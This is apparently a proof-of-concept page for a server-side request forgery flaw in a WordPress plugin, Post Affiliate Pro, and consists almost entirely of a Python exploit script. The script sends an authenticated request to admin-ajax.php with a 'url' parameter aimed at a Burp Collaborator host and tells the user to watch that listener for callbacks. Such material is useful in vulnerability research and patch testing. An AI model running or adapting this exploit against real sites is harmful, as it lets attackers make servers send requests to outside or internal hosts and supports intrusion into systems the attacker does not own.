CVE-2026-2290 WordPress Post Affiliate Pro SSRF漏洞

import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" attacker_controlled_url = "http://burpcollaborator.net" # Authentication cookie (Admin level required) cookies = { "wordpress_logged_in_xxx": "admin_cookie_value", "wordpress_sec_xxx": "secure_cookie_value" } # Payload data - Simulating the vulnerable action found in Base.class.php payload = { "action": "postaffiliatepro_action", "url": attacker_controlled_url # Vulnerable parameter triggering SSRF } try: # Sending the request to trigger SSRF response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) # Check if the server-side request was initiated successfully if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Server response:", response.text) print("[+] Check your collaborator listener for DNS/HTTP interactions.") else: print("[-] Failed to send request. Status code:", response.status_code) except Exception as e: print(f"[-] An error occurred: {e}")